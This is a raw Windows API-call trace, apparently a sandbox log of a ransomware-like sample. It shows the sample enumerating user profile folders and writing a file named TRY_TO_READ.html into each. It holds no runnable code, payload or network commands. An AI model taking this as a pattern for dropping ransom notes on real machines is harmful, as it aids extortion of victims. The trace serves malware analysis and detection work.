	[0053.030] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1
	[0053.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.030] GetLastError () returned 0x0
	[0053.030] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.032] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.033] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.033] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.033] CloseHandle (hObject=0x450) returned 1
	[0053.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b7e0 | out: hHeap=0x540000) returned 1
	[0053.033] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1
	[0053.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.033] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.033] GetLastError () returned 0x0
	[0053.033] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579c70 | out: hHeap=0x540000) returned 1
	[0053.034] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.035] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.035] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.035] CloseHandle (hObject=0x450) returned 1
	[0053.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b838 | out: hHeap=0x540000) returned 1
	[0053.036] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9670240, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb9670240, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0053.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.036] GetLastError () returned 0x0
	[0053.036] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579c70 | out: hHeap=0x540000) returned 1
	[0053.037] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.038] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.038] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.038] CloseHandle (hObject=0x450) returned 1
	[0053.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b890 | out: hHeap=0x540000) returned 1
	[0053.038] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4c59580, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb4c59580, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0053.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.038] GetLastError () returned 0x0
	[0053.038] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.039] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.039] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.040] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.040] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.040] CloseHandle (hObject=0x450) returned 1
	[0053.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0053.040] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0053.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.040] GetLastError () returned 0x0
	[0053.040] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.041] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.041] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.042] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.042] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.042] CloseHandle (hObject=0x450) returned 1
	[0053.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56e958 | out: hHeap=0x540000) returned 1
	[0053.042] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1
	[0053.042] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.042] GetLastError () returned 0x0
	[0053.042] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.043] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.043] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.044] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.044] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.044] CloseHandle (hObject=0x450) returned 1
	[0053.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0053.044] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0053.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.044] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.044] GetLastError () returned 0x0
	[0053.044] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0053.045] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.046] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.046] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.046] CloseHandle (hObject=0x450) returned 1
	[0053.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b8e8 | out: hHeap=0x540000) returned 1
	[0053.047] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1
	[0053.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.047] GetLastError () returned 0x0
	[0053.047] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4e6e8c0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb4e6e8c0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0053.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.047] GetLastError () returned 0x0
	[0053.047] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0053.047] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.048] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.048] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.048] CloseHandle (hObject=0x450) returned 1
	[0053.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b940 | out: hHeap=0x540000) returned 1
	[0053.048] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1
	[0053.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.048] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.048] GetLastError () returned 0x0
	[0053.049] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.049] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.050] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.050] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.050] CloseHandle (hObject=0x450) returned 1
	[0053.050] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.050] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.050] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.050] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0053.051] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1
	[0053.051] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.051] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.051] GetLastError () returned 0xb7
	[0053.051] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.051] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0053.051] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.052] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
